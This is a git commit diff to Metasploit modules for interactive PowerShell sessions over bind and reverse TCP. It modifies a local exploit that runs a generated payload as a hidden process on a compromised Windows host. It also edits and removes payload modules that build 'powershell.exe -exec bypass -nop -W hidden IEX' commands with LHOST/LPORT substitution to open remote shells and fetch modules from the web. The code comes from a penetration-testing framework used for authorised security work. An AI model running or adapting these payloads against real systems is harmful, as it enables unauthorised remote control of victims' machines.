Updated payloads and fixed msftidy.
parent
ded904c72c
commit
e6c61c461e
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
payload = datastore['PAYLOAD']
|
||||
|
||||
# sysinfo is only on meterpreter sessions
|
||||
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||
vprint_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||
|
||||
# Check that the payload is a Windows one and on the list
|
||||
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
|
||||
|
@ -62,52 +62,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
|
||||
pay = client.framework.payloads.create(payload)
|
||||
pay.datastore['LHOST'] = lhost
|
||||
pay.datastore['LPORT'] = lport
|
||||
pay.datastore['RHOST'] = rhost
|
||||
|
||||
raw = pay.generate
|
||||
raw = generate_payload.raw
|
||||
res = session.sys.process.execute("#{raw}", nil, 'Hidden' => true, 'Channelized' => false)
|
||||
fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
|
||||
computer_name = session.sys.config.sysinfo['Computer']
|
||||
vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
|
||||
|
||||
if datastore['LHOST'].to_s.empty?
|
||||
if session.framework.payloads.keys.grep(/bind/).include?(datastore['PAYLOAD'])
|
||||
print_status("Attemping to connect to #{rhost}:#{lport}...")
|
||||
ctimeout = 10
|
||||
stime = Time.now.to_i
|
||||
last_error = nil
|
||||
|
||||
while stime + ctimeout > Time.now.to_i
|
||||
Rex::ThreadSafe.sleep(2)
|
||||
begin
|
||||
client = Rex::Socket::Tcp.create(
|
||||
'PeerHost' => rhost,
|
||||
'PeerPort' => lport.to_i,
|
||||
'Proxies' => datastore['Proxies'],
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfPayload' => payload_instance,
|
||||
'MsfExploit' => self
|
||||
})
|
||||
rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
|
||||
last_error = e
|
||||
end
|
||||
|
||||
if client
|
||||
handler(client)
|
||||
return
|
||||
end
|
||||
end
|
||||
print_warning("If a shell is unsuccesful, ensure you have access to the target host and port.")
|
||||
print_status("Try adding a route to the host: `route help`")
|
||||
if last_error
|
||||
raise last_error
|
||||
else
|
||||
fail_with(Failure::Unknown, "Unable to connect")
|
||||
end
|
||||
else
|
||||
print_status("Waiting for connection from #{rhost}:#{lport}...")
|
||||
end
|
||||
|
|
|
@ -15,8 +15,8 @@ module Metasploit3
|
|||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
|
||||
'Description' => 'Listen for a connection and spawn an interactive powershell session',
|
||||
'Name' => 'Windows Interactive Powershell Session, Bins TCP',
|
||||
'Description' => 'Interacts with a powershell session on an established socket connection',
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Turner', # benpturner
|
||||
|
@ -47,6 +47,7 @@ module Metasploit3
|
|||
|
||||
def generate
|
||||
lport = datastore['LPORT']
|
||||
lhost = datastore['LHOST']
|
||||
|
||||
template_path = File.join(
|
||||
Msf::Config.data_directory,
|
||||
|
@ -62,14 +63,15 @@ module Metasploit3
|
|||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
end
|
||||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORTs_REPLACE', lport.to_s)
|
||||
script_in.gsub!('LPORT_REPLACE', lport.to_s)
|
||||
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
||||
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
|
||||
|
|
|
@ -15,7 +15,7 @@ module Metasploit3
|
|||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
|
||||
'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
|
||||
'Description' => 'Interacts with a powershell session on an established socket connection',
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -63,7 +63,7 @@ module Metasploit3
|
|||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
|
|
|
@ -1,84 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/windows/exec'
|
||||
require 'msf/base/sessions/powershell'
|
||||
###
|
||||
#
|
||||
# Extends the Exec payload to add a new user.
|
||||
#
|
||||
###
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 1455
|
||||
|
||||
include Msf::Payload::Windows::Exec
|
||||
include Rex::Powershell::Command
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
|
||||
'Description' => 'Listen for a connection and spawn an interactive powershell session',
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Turner', # benpturner
|
||||
'Dave Hardy' # davehardy20
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::BindTcp,
|
||||
'Session' => Msf::Sessions::PowerShell,
|
||||
))
|
||||
|
||||
# Register command execution options
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
|
||||
], self.class)
|
||||
# Hide the CMD option...this is kinda ugly
|
||||
deregister_options('CMD')
|
||||
end
|
||||
|
||||
#
|
||||
# Override the exec command string
|
||||
#
|
||||
def command_string
|
||||
lport = datastore['LPORT']
|
||||
|
||||
template_path = File.join(
|
||||
Msf::Config.data_directory,
|
||||
'exploits',
|
||||
'powershell',
|
||||
'powerfun.ps1')
|
||||
|
||||
script_in = File.read(template_path)
|
||||
script_in << "\npowerfun -Command bind"
|
||||
|
||||
mods = ''
|
||||
|
||||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
end
|
||||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORT_REPLACE', lport.to_s)
|
||||
# Base64 encode the compressed file contents
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
|
||||
|
||||
end
|
||||
end
|
||||
|
|
@ -1,86 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/windows/exec'
|
||||
require 'msf/base/sessions/powershell'
|
||||
###
|
||||
#
|
||||
# Extends the Exec payload to add a new user.
|
||||
#
|
||||
###
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 1439
|
||||
|
||||
include Msf::Payload::Windows::Exec
|
||||
include Rex::Powershell::Command
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
|
||||
'Description' => 'Listen for a connection and spawn an interactive powershell session',
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Turner', # benpturner
|
||||
'Dave Hardy' # davehardy20
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::PowerShell,
|
||||
))
|
||||
|
||||
# Register command execution options
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
|
||||
], self.class)
|
||||
# Hide the CMD option...this is kinda ugly
|
||||
deregister_options('CMD')
|
||||
end
|
||||
|
||||
#
|
||||
# Override the exec command string
|
||||
#
|
||||
def command_string
|
||||
lport = datastore['LPORT']
|
||||
lhost = datastore['LHOST']
|
||||
|
||||
template_path = File.join(
|
||||
Msf::Config.data_directory,
|
||||
'exploits',
|
||||
'powershell',
|
||||
'powerfun.ps1')
|
||||
|
||||
script_in = File.read(template_path)
|
||||
script_in << "\npowerfun -Command reverse"
|
||||
|
||||
mods = ''
|
||||
|
||||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
end
|
||||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORT_REPLACE', lport.to_s)
|
||||
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
||||
# Base64 encode the compressed file contents
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
|
||||
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue